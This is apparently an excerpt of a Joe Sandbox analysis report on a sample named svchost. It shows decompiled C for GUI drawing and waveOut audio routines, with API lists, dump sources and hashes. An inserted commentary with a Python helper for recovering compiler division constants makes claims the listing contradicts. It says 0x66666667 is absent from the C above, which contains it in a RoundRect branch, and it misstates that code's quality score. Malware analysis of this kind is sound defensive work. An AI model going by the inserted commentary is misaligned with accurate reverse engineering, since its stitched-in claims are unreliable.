    							_push(( *(0x4b4114 + _t252 * 8) >> 0x00000010 & 0x000000ff | 0x00000002) << 0x00000008 << 0x00000008 |  *(0x4b4114 + _t252 * 8) & 0x000000ff);
    							E00489F7B( &_v88);
    							_v20 = 2;
    							_v108.bottom = 0;
    							_v108.right = 0x498acc;
    							_v20 = 3;
    							E00489EBE( &_v112, CreatePen(0, 1, GetSysColor(0x10)));
    							_t170 = E00489512(_t370,  &_v108);
    							_t172 = E00489512(_t370,  &_v120);
    							InflateRect( &_v84,  ~( *(_t376 + 0x4c) + 1),  ~( *(_t376 + 0x4c) + 1));
    							Rectangle( *(_t370 + 4), _v84, _v84.top, _v84.right, _v84.bottom);
    							E00489512(_t370, _t170);
    							E00489512(_t370, _t172);
    							E00489F15( &_v144);
    							E00489F15( &_v152);
    							_t379 = _v68.right;
    							if(_v68.right != 0 && (GetDeviceCaps( *(_t370 + 8), 0x26) & 0x00000001) != 0) {
    								E0048959D(_t370, _t379, 0);
    							}
    							_v132 = 0x498ac0;
    							_v52 = 4;
    							E00489F15( &_v132);
    							_v124 = 0x498ac0;
    							_v52 = 5;
    							_t281 =  &_v124;
    							goto L40;
    						}
    					} else {
    						_t255 = _t376 + 0x70;
    						_t192 = GetSysColor(0xf);
    						_t371 = _a4;
    						_push(_t192);
    						E0048BEC9(_t371, _t255);
    						_v68.top = _t255[1];
    						_v68.left =  *_t255;
    						_v68.right = _t255[2];
    						_v68.bottom.left = _t255[3];
    						InflateRect( &_v68, 0xffffffff, 0xffffffff);
    						if( *((intOrPtr*)(_t376 + 0x54)) != 0xfffffffd ||  *((intOrPtr*)(_t376 + 0x50)) == 0xfffffffd) {
    							_push(GetSysColor(0xf));
    							_push( &(_v68.top));
    						} else {
    							_push(GetSysColor(0x16));
    							_push( &(_v68.top));
    						}
    						E0048BEC9(_t371);
    						_v40.top = _v68.left;
    						_v40.right = _v68.top;
    						_v40.left = _v84.bottom;
    						_v40.bottom = _v68.right;
    						InflateRect( &_v40,  ~( *(_t376 + 0x4c) << 1),  ~( *(_t376 + 0x4c) << 1));
    						E00489F2B( &(_v84.top));
    						_v40.bottom = 0;
    						_t207 = E00489512(_t371,  &_v92);
    						 *((intOrPtr*)( *_t371 + 0x24))(5, 0, 1, GetSysColor(0x10));
    						Rectangle( *(_t371 + 4), _v68.right, _v68.bottom.left, _v52, _v48);
    						E00489512(_t371, _t207);
    						if( *((intOrPtr*)(_t376 + 0x50)) != 0xfffffffd) {
    							if( *((intOrPtr*)(_t376 + 0x54)) == 0xfffffffd) {
    								DrawEdge( *(_t371 + 4),  &(_v108.top), 2, 0xf);
    								goto L22;
    							}
    						} else {
    							DrawEdge( *(_t371 + 4),  &(_v108.top), 4, 0xf);
    							L22:
    						}
    						_t215 =  *((intOrPtr*)( *_t371 + 0x28))(_t376 + 0x90);
    						E004895EE(_t371, 1);
    						_t381 =  *((intOrPtr*)(_t376 + 0x58));
    						 *((intOrPtr*)( *_t371 + 0x68))(_t381,  *((intOrPtr*)(_t381 - 8)),  &_v112, 0x25);
    						 *((intOrPtr*)( *_t371 + 0x28))(_t215);
    						_v140 = 0x498ac0;
    						_v84.right = 1;
    						_t281 =  &_v140;
    						L40:
    						_t159 = E00489F15(_t281);
    					}
    				} else {
    					_t372 = __ecx + 0x60;
    					_t310 = __ecx + 0x60;
    					_v68.right =  *_t310;
    					_v52 = _t310[2];
    					_v48 = _t310[3];
    					_v68.bottom = _t310[1] +  *(__ecx + 0x4c) * 2;
    					_t226 = GetSysColor(0xf);
    					_t258 = _a4;
    					_push(_t226);
    					E0048BEC9(_t258,  &(_v68.right));
    					_v4 =  *(_t376 + 0x4c);
    					E0048BEF3(_t258,  *_t372 + _v4 * 2,  *((intOrPtr*)(_t376 + 0x64)), _t372[2] -  *_t372 - _v4 * 4, 1, GetSysColor(0x10));
    					_v24 =  *(_t376 + 0x4c);
    					E0048BEF3(_t258,  *_t372 + _v24 * 2,  *((intOrPtr*)(_t376 + 0x64)) + 1, _t372[2] -  *_t372 - _v24 * 4, 1, GetSysColor(0x14));
    					InflateRect( &_v108, 0xffffffff, 0xffffffff);
    					if( *((intOrPtr*)(_t376 + 0x54)) != 0xfffffffe ||  *((intOrPtr*)(_t376 + 0x50)) == 0xfffffffe) {
    						_push(GetSysColor(0xf));
    						_push( &(_v68.top));
    					} else {
    						_push(GetSysColor(0x16));
    						_push( &(_v68.top));
    					}
    					E0048BEC9(_t258);
    					if( *((intOrPtr*)(_t376 + 0x50)) != 0xfffffffe) {
    						if( *((intOrPtr*)(_t376 + 0x54)) == 0xfffffffe) {
    							DrawEdge( *(_t258 + 4),  &_v68, 2, 0xf);
    							goto L10;
    						}
    					} else {
    						DrawEdge( *(_t258 + 4),  &_v68, 4, 0xf);
    						L10:
    					}
    					_t243 =  *((intOrPtr*)( *_t258 + 0x28))(_t376 + 0x90);
    					E004895EE(_t258, 1);
    					_t382 =  *((intOrPtr*)(_t376 + 0x5c));
    					 *((intOrPtr*)( *_t258 + 0x68))(_t382,  *((intOrPtr*)(_t382 - 8)),  &(_v84.right), 0x25);
    					_t159 =  *((intOrPtr*)( *_t258 + 0x28))(_t243);
    				}
    				 *[fs:0x0] = _v12;
    				return _t159;
    			}

    APIs
    • GetSysColor.USER32(00000010), ref: 004487E8
      • Part of subcall function 0048BEF3: SetBkColor.GDI32(?,?), ref: 0048BF02
      • Part of subcall function 0048BEF3: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0048BF34
    • GetSysColor.USER32(00000014), ref: 00448820
    • InflateRect.USER32(?,000000FF,000000FF), ref: 00448852
    • GetSysColor.USER32(00000016), ref: 0044886B
    • GetSysColor.USER32(0000000F), ref: 0044887B
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 004488B4
    • GetDeviceCaps.GDI32(?), ref: 00448ABE
    • RealizePalette.GDI32(?), ref: 00448AE1
    • GetSysColor.USER32(00000014), ref: 00448AF9
    • GetSysColor.USER32(0000000F), ref: 00448B0B
    • GetSysColor.USER32(0000000F), ref: 004487C1
      • Part of subcall function 0048BEC9: SetBkColor.GDI32(?,?), ref: 0048BED3
      • Part of subcall function 0048BEC9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0048BEE9
    • GetSysColor.USER32(0000000F), ref: 00448918
    • InflateRect.USER32(?,000000FF,000000FF), ref: 00448951
    • GetSysColor.USER32(00000016), ref: 00448966
    • GetSysColor.USER32(0000000F), ref: 00448972
    • InflateRect.USER32(?,?,?), ref: 004489B3
    • GetSysColor.USER32(00000010), ref: 004489B7
    • Rectangle.GDI32(?,?,?,?,?), ref: 004489FE
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 00448A39
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 00448B40
    • GetSysColor.USER32(00000010), ref: 00448B9D
    • CreatePen.GDI32(00000000,00000001,00000000), ref: 00448BA4
    • InflateRect.USER32(?,?,?), ref: 00448BE3
    • Rectangle.GDI32(?,?,?,?,?), ref: 00448C01
    • GetDeviceCaps.GDI32(?,00000026), ref: 00448C37
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Color$InflateRect$DrawEdge$CapsDeviceRectangleText$CreatePaletteRealize
    • String ID:
    • API String ID: 3119264602-0
    • Opcode ID: c40bced6907cb01c54eb932bea9f1fa2bd124cfb037f5dbd86643705824c6103
    • Instruction ID: 5695caa02def92cc05cd3739fafe5a8f7e32d3753678329eee2a2bf7f29c1fe6
    • Opcode Fuzzy Hash: c40bced6907cb01c54eb932bea9f1fa2bd124cfb037f5dbd86643705824c6103
    • Instruction Fuzzy Hash: 75F15671204701AFD714EB64C885E7FB3E9FB88714F048A2EF69687291DBB4E805CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040E3C0(void* __ecx, void* __eflags) {
    				int _v8;
    				intOrPtr _v16;
    				char _v24;
    				char _v52;
    				char _v76;
    				int _v84;
    				char _v92;
    				char _v100;
    				struct HDC__* _v108;
    				char _v112;
    				char _v116;
    				struct HDC__* _v120;
    				struct tagRECT _v136;
    				intOrPtr _v148;
    				struct HDC__* _v160;
    				intOrPtr _v168;
    				intOrPtr _v172;
    				int _v176;
    				struct HDC__* _v180;
    				char _v184;
    				char _v188;
    				char _v192;
    				struct tagRECT _v208;
    				intOrPtr _v216;
    				int _v220;
    				intOrPtr _v224;
    				char _v228;
    				int _v232;
    				int _v240;
    				int _v244;
    				int _v248;
    				int _v252;
    				int _v256;
    				int _v260;
    				intOrPtr _v264;
    				int _v268;
    				int _v272;
    				struct tagRECT _v288;
    				void* __ebp;
    				int _t147;
    				int _t153;
    				int _t157;
    				signed int _t162;
    				signed int _t170;
    				int* _t173;
    				signed int _t176;
    				int _t178;
    				void* _t186;
    				long _t191;
    				void* _t210;
    				void* _t212;
    				int _t221;
    				intOrPtr _t229;
    				int _t246;
    				int _t258;
    				signed int _t264;
    				void* _t267;
    				int _t272;
    				void* _t275;
    				int _t280;
    				int _t284;
    				intOrPtr _t286;
    
    				_push(0xffffffff);
    				_push(0x48df90);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t286;
    				_t212 = __ecx;
    				_push(__ecx);
    				E00489D7E( &_v112, __eflags);
    				_v8 = 0;
    				E0048992F( &_v116,  &(_v136.top));
    				_t147 = IsRectEmpty( &_v136);
    				_t292 = _t147 - 1;
    				if(_t147 != 1) {
    					_push(GetCurrentObject(_v108, 2));
    					_v148 = E00489EA9();
    					_push(GetCurrentObject(_v120, 1));
    					_v172 = E00489EA9();
    					_t153 =  *(_t212 + 0x4c);
    					__eflags = _t153;
    					if(_t153 != 0) {
    						__eflags = _t153 - 1;
    						if(_t153 != 1) {
    							__eflags = _t153 - 2;
    							if(_t153 != 2) {
    								__eflags = _t153 - 3;
    								if(_t153 != 3) {
    									__eflags = _t153 - 4;
    									_t221 = (0 | _t153 != 0x00000004) + 3;
    									__eflags = _t221;
    									_t272 = _t221;
    								} else {
    									_t272 = 2;
    								}
    							} else {
    								_t272 = 1;
    							}
    						} else {
    							_t272 = 6;
    						}
    					} else {
    						_t272 = 5;
    					}
    					__eflags =  *(_t212 + 0x48);
    					if( *(_t212 + 0x48) != 0) {
    						L14:
    						_t264 = 1;
    					} else {
    						__eflags = _t153 - 1;
    						if(_t153 != 1) {
    							goto L14;
    						} else {
    							_t264 =  *(_t212 + 0x50);
    						}
    					}
    					_v184 = 0;
    					_v188 = 0x495e94;
    					_v176 = 0;
    					_v180 = 0x495e94;
    					_v24 = 2;
    					GetClientRect( *(_t212 + 0x1c),  &_v208);
    					_t157 =  *(_t212 + 0x48);
    					__eflags = _t157;
    					if(_t157 != 0) {
    						__eflags = _t157 - 1;
    						if(_t157 != 1) {
    							E00489EBE( &(_v208.right), CreatePen(_t272, 0, 0));
    							_push(0xffffff);
    						} else {
    							E00489EBE( &(_v208.right), CreatePen(_t272, 0, 0xffffff));
    							_push(0);
    						}
    						E00489EBE( &(_v208.top), CreatePen(_t272, 0, ??));
    						_t162 =  *(_t212 + 0x44);
    						__eflags = _t162 - 6;
    						if(_t162 == 6) {
    							L24:
    							_t36 =  &_v228;
    							 *_t36 = _v228 + 1;
    							__eflags =  *_t36;
    						} else {
    							__eflags = _t162 - 7;
    							if(_t162 != 7) {
    								_t34 =  &_v232;
    								 *_t34 = _v232 + 1;
    								__eflags =  *_t34;
    								goto L24;
    							} else {
    								_v232 = _v232 + 1;
    							}
    						}
    					} else {
    						asm("sbb ecx, ecx");
    						E00489EBE( &(_v208.right), CreatePen(_t272,  ~(_t264 - 1) & _t264,  *(_t212 + 0x54)));
    					}
    					_push(E0040C100( *((intOrPtr*)(_t212 + 0x40))));
    					E00489F7B( &_v184);
    					_v52 = 3;
    					E00489512( &_v160,  &_v188);
    					_t258 = _v176;
    					PatBlt(_v160, _v180, _t258, _v172 - _v180, _v168 - _t258, 0xf00021);
    					_t229 = _v264;
    					_t280 = _v260;
    					_t170 =  *(_t212 + 0x44);
    					_t275 = _v256 - _t229;
    					_t267 = _v252 - _t280;
    					__eflags = _t170 - 1;
    					if(_t170 == 1) {
    						L28:
    						__eflags = _t267 - _t275;
    						if(__eflags >= 0) {
    							if(__eflags > 0) {
    								asm("cdq");
    								_t284 = _t280 + (_t267 - _t275 - _t258 >> 1);
    								__eflags = _t284;
    								_v256 = _t284;
    								_v248 = _t275 + _t284;
    							}
    						} else {
    							asm("cdq");
    							_t246 = _t229 + (_t275 - _t267 - _t258 >> 1);
    							_v260 = _t246;
    							_v252 = _t267 + _t246;
    						}
    					} else {
    						__eflags = _t170 - 3;
    						if(_t170 == 3) {
    							goto L28;
    						} else {
    							__eflags = _t170 - 5;
    							if(_t170 == 5) {
    								goto L28;
    							}
    						}
    					}
    					__eflags = 0;
    					_v224 = 0x495e54;
    					_v220 = 0;
    					_v76 = 4;
    					E004895EE( &_v184, 1);
    					_v248 = 0;
    					do {
    						__eflags = _v244;
    						if(_v244 == 0) {
    							_t173 =  &_v240;
    							goto L36;
    						} else {
    							__eflags =  *(_t212 + 0x48);
    							if( *(_t212 + 0x48) != 0) {
    								_t173 =  &_v232;
    								L36:
    								E00489512( &_v184, _t173);
    								__eflags = _v248 - 1;
    								if(_v248 == 1) {
    									L40:
    									E004894D6( &_v184, 5);
    								} else {
    									_t191 =  *(_t212 + 0x58);
    									__eflags = _t191 - 0xff000000;
    									if(_t191 == 0xff000000) {
    										goto L40;
    									} else {
    										E00489EBE( &_v228, CreateSolidBrush(_t191));
    										_t71 =  &_v232; // 0x495e54
    										E00489512( &_v192, _t71);
    									}
    								}
    								_t176 =  *(_t212 + 0x44);
    								__eflags = _t176 - 7;
    								if(_t176 <= 7) {
    									switch( *((intOrPtr*)(_t176 * 4 +  &M0040E88C))) {
    										case 0:
    											Rectangle(_v180, _v260, _v256, _v252, _v248);
    											OffsetRect( &(_v288.right), 0xffffffff, 0xffffffff);
    											goto L48;
    										case 1:
    											__ecx = _v256;
    											Ellipse(_v180, _v260, _v256, _v252, _v248);
    											__ecx =  &(_v288.right);
    											OffsetRect(__ecx, 0xffffffff, 0xffffffff);
    											goto L48;
    										case 2:
    											(0x66666667 * __esi >> 0x20 >> 1) + (0x66666667 * __esi >> 0x20 >> 1 >> 0x1f) = _v248;
    											__ecx = _v260;
    											RoundRect(_v180, __ecx, _v256, _v252, _v248, __ecx, _v180);
    											OffsetRect( &_v288, 0xffffffff, 0xffffffff);
    											goto L48;
    										case 3:
    											__ecx = _v256;
    											__ecx =  &_v184;
    											E00489A03( &_v184,  &_v92, _v260, _v256);
    											__ecx = _v268;
    											__ecx =  &(_v208.bottom);
    											E00489A4F(__ecx, _v264, _v268);
    											_v288.bottom = _v288.bottom - 1;
    											goto L48;
    										case 4:
    											__ecx = _v260;
    											__ecx =  &_v184;
    											E00489A03( &_v184,  &_v100, _v260, _v256);
    											__ecx = _v272;
    											__ecx =  &(_v208.bottom);
    											E00489A4F(__ecx, _v272, _v260);
    											_t120 =  &(_v288.right);
    											 *_t120 = _v288.right.left - 1;
    											__eflags =  *_t120;
    											goto L48;
    									}
    								}
    								goto L48;
    							}
    						}
    						break;
    						L48:
    						_t178 = _v244 + 1;
    						__eflags = _t178 - 1;
    						_v244 = _t178;
    					} while (_t178 <= 1);
    					E00489512( &_v184, _v216);
    					E00489512( &_v188, _v208.left);
    					_v232 = 0x495e6c;
    					_t129 =  &_v232; // 0x495e54
    					_v84 = 5;
    					E00489F15(_t129);
    					_v220 = 0x495e6c;
    					_v84 = 6;
    					E00489F15( &_v220);
    					_v240 = 0x495e6c;
    					_v84 = 7;
    					E00489F15( &_v240);
    					_v248 = 0x495e6c;
    					_v84 = 8;
    					E00489F15( &_v248);
    					_v84 = 0xffffffff;
    					_t186 = E00489DF0( &_v192, __eflags);
    					 *[fs:0x0] = _v92;
    					return _t186;
    				} else {
    					_v8 = 0xffffffff;
    					_t210 = E00489DF0( &_v116, _t292);
    					 *[fs:0x0] = _v16;
    					return _t210;
    				}
    			}

    Instruction addresses for the listing above (the per-line address column, detached from the C code by extraction; 0x00000000 entries marked lines that carry no address): 0x0040e3c0 through 0x0040e88b.

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 0048992F: GetClipBox.GDI32(?,?), ref: 00489936
    • IsRectEmpty.USER32(?), ref: 0040E405
    • GetCurrentObject.GDI32(?,00000002), ref: 0040E44A
    • GetCurrentObject.GDI32(?,00000001), ref: 0040E45D
    • GetClientRect.USER32 ref: 0040E4E2
    • CreatePen.GDI32(-00000003,00000000,?), ref: 0040E4FE
    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0040E5C2
      • Part of subcall function 00489DF0: __EH_prolog.LIBCMT ref: 00489DF5
      • Part of subcall function 00489DF0: EndPaint.USER32(?,?,?,?,0040D373), ref: 00489E12
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologObjectPaintRect$BeginClientClipCreateEmpty
    • String ID: T^I$gfff
    • API String ID: 3506841274-2792297147
    • Opcode ID: 41cbe53cc8b8207b904fcd72d02e0e1d72c53d6ecdd943bb7a0e5b951f57e7c2
    • Instruction ID: 2d599b94dc978d4b82ee64bb374e91882af597f683c2f348f5804e471c1339c3
    • Opcode Fuzzy Hash: 41cbe53cc8b8207b904fcd72d02e0e1d72c53d6ecdd943bb7a0e5b951f57e7c2
    • Instruction Fuzzy Hash: ECE17DB1508340ABC718DF55C884A6FB7E8FB98714F144E2EF59593290DB38E909CB6B
    Uniqueness

    Uniqueness Score: -1.00%
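The String ID line for this function reads T^I$gfff. Joe Sandbox builds these IDs from immediates whose bytes happen to look like text: T^I is the little-endian byte image of 0x495e54, which matches the `// 0x495e54` annotation in the listing, and gfff is 0x66666667, a constant that does not appear anywhere in the 57%-quality C above. 0x66666667 followed by a one-bit arithmetic shift is the standard compiler multiplier for signed division by 5, so the inference is that this function divides by 5 at a point the decompiler folded. The Python below is an added example, not code from the report or from the sample: it emulates the imul / add / sar / sign-fix sequence compilers emit for constant division and brute-forces the divisor behind any such (magic, shift) pair. Everything in it is generic x86 arithmetic; only the constant is taken from this page.

```python
# Added example (not part of the Joe Sandbox report): emulate and recover
# compiler "magic number" signed division, such as the 0x66666667 constant
# that surfaces in the listing above only as the String ID "gfff".


def _signed(v: int, bits: int) -> int:
    """Interpret the low `bits` bits of v as a two's-complement integer."""
    v &= (1 << bits) - 1
    return v - (1 << bits) if v >> (bits - 1) else v


def magic_sdiv(x: int, magic: int, shift: int, bits: int = 32) -> int:
    """Emulate the MSVC/GCC sequence for signed division by a constant:
         imul  magic          -> take the high half of the product
         add   edx, x         -> only when magic is negative as signed (e.g. /7)
         sar   edx, shift
         shr eax,31 / add     -> add 1 when the result is negative (round toward zero)
    """
    x = _signed(x, bits)
    m = _signed(magic, bits)
    hi = (x * m) >> bits            # Python's >> floors, matching the signed high dword
    if m < 0:
        hi += x                     # the compiler's "add edx, x" correction
    q = hi >> shift
    q += (q >> (bits - 1)) & 1      # sign fix: +1 when q is negative
    return q


def trunc_div(x: int, d: int) -> int:
    """C-style truncating division, for comparison."""
    q = abs(x) // abs(d)
    return -q if (x < 0) != (d < 0) else q


# Probe values: small signed values, the 32-bit extremes, and a few large ones.
PROBES = list(range(-64, 65)) + [2**31 - 1, -2**31, 0x3C00, -0x3C00, 123456789, -987654321]


def recover_divisor(magic: int, shift: int, bits: int = 32, limit: int = 1 << 16):
    """Brute-force the divisor d for which (magic, shift) computes x / d on every probe."""
    for d in range(2, limit):
        if all(magic_sdiv(x, magic, shift, bits) == trunc_div(x, d) for x in PROBES):
            return d
    return None


if __name__ == "__main__":
    gfff = int.from_bytes(b"gfff", "little")     # 0x66666667, the constant behind "gfff"
    print(hex(gfff), "with sar 1 divides by", recover_divisor(gfff, 1))
```

When a decompilation shows a suspicious immediate and a shift but no division, running `recover_divisor` on the pair is quicker than deriving the reciprocal by hand; the same routine covers the negative-magic form (0x92492493 with sar 2 is /7) because the emulation includes the add-dividend correction.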

    C-Code - Quality: 57%
    			E0043D0D0() {
    				long _t65;
    				signed int _t69;
    				struct wavehdr_tag* _t72;
    				signed int _t74;
    				intOrPtr* _t88;
    				intOrPtr _t89;
    				void* _t92;
    				long _t96;
    				void* _t107;
    				struct wavehdr_tag* _t111;
    				struct wavehdr_tag* _t116;
    				intOrPtr _t117;
    				intOrPtr _t119;
    				intOrPtr _t122;
    				signed int _t125;
    				signed int _t126;
    				void* _t142;
    				void* _t143;
    				void* _t146;
    				long _t155;
    				void* _t156;
    				intOrPtr _t157;
    				intOrPtr _t160;
    				long* _t161;
    				void* _t162;
    				void* _t163;
    				intOrPtr* _t164;
    				void* _t165;
    
    				_t164 =  *((intOrPtr*)(_t165 + 0xc));
    				while(1) {
    					L1:
    					_t65 = WaitForMultipleObjects(2, _t164 + 0x28, 0, 0x22b8);
    					if(_t65 != 0) {
    						break;
    					}
    					_t146 = _t164 + 0x30;
    					 *0x49224c(_t146);
    					_t155 =  *(_t164 + 0x10);
    					 *(_t165 + 0x18) = _t155;
    					 *0x492250(_t146);
    					if(_t155 <= 0) {
    						continue;
    					} else {
    						_t116 = ( *(_t164 + 0x14) << 5) +  *((intOrPtr*)(_t164 + 0xc));
    						if((_t116->dwFlags & 0x00000002) != 0) {
    							waveOutUnprepareHeader( *(_t164 + 4), _t116, 0x20);
    						}
    						_t160 =  *((intOrPtr*)(_t164 + 0x1c));
    						_t69 =  *((intOrPtr*)(_t164 + 8)) - _t160;
    						if(_t69 <= 0x3c00) {
    							if(_t69 <= 0) {
    								if( *((intOrPtr*)(_t165 + 0x14)) < 0x14) {
    									continue;
    								} else {
    									_t161 = 0;
    									if( *((intOrPtr*)(_t164 + 0x48)) == 0) {
    										do {
    											_t72 =  *((intOrPtr*)(_t164 + 0xc)) + _t161;
    											if((_t72->dwFlags & 0x00000002) != 0) {
    												waveOutUnprepareHeader( *(_t164 + 4), _t72, 0x20);
    											}
    											_t161 = _t161 + 0x20;
    										} while (_t161 < 0x280);
    									} else {
    										 *0x49224c(_t146);
    										_t92 =  *(_t164 + 0x28);
    										 *((intOrPtr*)(_t164 + 0x1c)) = 0;
    										 *(_t164 + 0x14) = 0;
    										 *(_t164 + 0x10) = 0x14;
    										if(_t92 != 0) {
    											ReleaseSemaphore(_t92, 0x14, 0);
    										}
    										 *0x492250(_t146);
    										continue;
    									}
    								}
    							} else {
    								goto L11;
    							}
    						} else {
    							_t69 = 0x3c00;
    							L11:
    							_t125 = _t69;
    							_t162 = _t160 +  *_t164;
    							_t126 = _t125 >> 2;
    							memcpy( *_t116, _t162, _t126 << 2);
    							_t96 = memcpy(_t162 + _t126 + _t126, _t162, _t125 & 0x00000003);
    							_t165 = _t165 + 0x18;
    							_t116->dwBufferLength = _t96;
    							 *((intOrPtr*)(_t164 + 0x1c)) =  *((intOrPtr*)(_t164 + 0x1c)) + _t96;
    							waveOutPrepareHeader( *(_t164 + 4), _t116, 0x20);
    							waveOutWrite( *(_t164 + 4), _t116, 0x20);
    							_t163 = _t164 + 0x30;
    							 *0x49224c(_t163);
    							 *(_t164 + 0x10) =  *(_t164 + 0x10) - 1;
    							 *0x492250(_t163);
    							asm("cdq");
    							 *(_t164 + 0x14) = ( *(_t164 + 0x14) + 1) % 0x14;
    							continue;
    						}
    					}
    					L25:
    					 *0x49224c(0x4c9e70);
    					_t157 =  *0x4c9e90; // 0x0
    					_t119 =  *0x4c9e8c; // 0x0
    					_t74 = 0;
    					while(_t119 != 0 && _t74 < _t157 - _t119 >> 2) {
    						if( *((intOrPtr*)(_t119 + _t74 * 4)) == _t164) {
    							_t142 = _t119 + _t74 * 4;
    							_t122 = _t157;
    							_t53 = _t142 + 4; // 0x4
    							_t88 = _t53;
    							if(_t88 != _t122) {
    								_t143 = _t142 - _t88;
    								do {
    									 *((intOrPtr*)(_t143 + _t88)) =  *_t88;
    									_t88 = _t88 + 4;
    								} while (_t88 != _t122);
    								_t157 =  *0x4c9e90; // 0x0
    							}
    							_t55 = _t157 - 4; // -4
    							_t89 = _t55;
    							 *((intOrPtr*)(_t165 + 0x14)) = _t89;
    							 *0x4c9e90 = _t89;
    						} else {
    							_t74 = _t74 + 1;
    							continue;
    						}
    						break;
    					}
    					 *0x492250(0x4c9e70);
    					E0043CB90( *(_t164 + 4));
    					E004715AE( *_t164);
    					E0043CB30( *((intOrPtr*)(_t164 + 0xc)));
    					CloseHandle( *(_t164 + 0x20));
    					CloseHandle( *(_t164 + 0x28));
    					CloseHandle( *(_t164 + 0x2c));
    					 *0x492294(_t164 + 0x30);
    					E0048302C(_t164);
    					return 0;
    				}
    				_t107 = _t65 - 1;
    				if(_t107 == 0 || _t107 == 0x101) {
    					waveOutPause( *(_t164 + 4));
    					waveOutReset( *(_t164 + 4));
    					_t156 = 0;
    					do {
    						_t117 =  *((intOrPtr*)(_t164 + 0xc));
    						_t111 = _t156 + _t117;
    						if(( *(_t156 + _t117 + 0x10) & 0x00000002) != 0) {
    							waveOutUnprepareHeader( *(_t164 + 4), _t111, 0x20);
    						}
    						_t156 = _t156 + 0x20;
    					} while (_t156 < 0x280);
    				} else {
    					goto L1;
    				}
    				goto L25;
    			}

    Instruction addresses for the listing above (the per-line address column, detached from the C code by extraction; 0x00000000 entries marked lines that carry no address): 0x0043d0d2 through 0x0043d31d.

    APIs
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000022B8), ref: 0043D0E5
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D108
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D116
    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 0043D138
    • waveOutPrepareHeader.WINMM(?,?,00000020), ref: 0043D181
    • waveOutWrite.WINMM(?,?,00000020), ref: 0043D18E
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D198
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D1A6
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D1D5
    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 0043D1F3
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D1FA
    • waveOutPause.WINMM(?), ref: 0043D209
    • waveOutReset.WINMM(?), ref: 0043D213
    • waveOutUnprepareHeader.WINMM(?,00000000,00000020), ref: 0043D231
    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 0043D256
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043D26C
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043D2C8
    • CloseHandle.KERNEL32(?), ref: 0043D2F6
    • CloseHandle.KERNEL32(?), ref: 0043D2FC
    • CloseHandle.KERNEL32(?), ref: 0043D302
    • RtlDeleteCriticalSection.NTDLL(?), ref: 0043D308
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
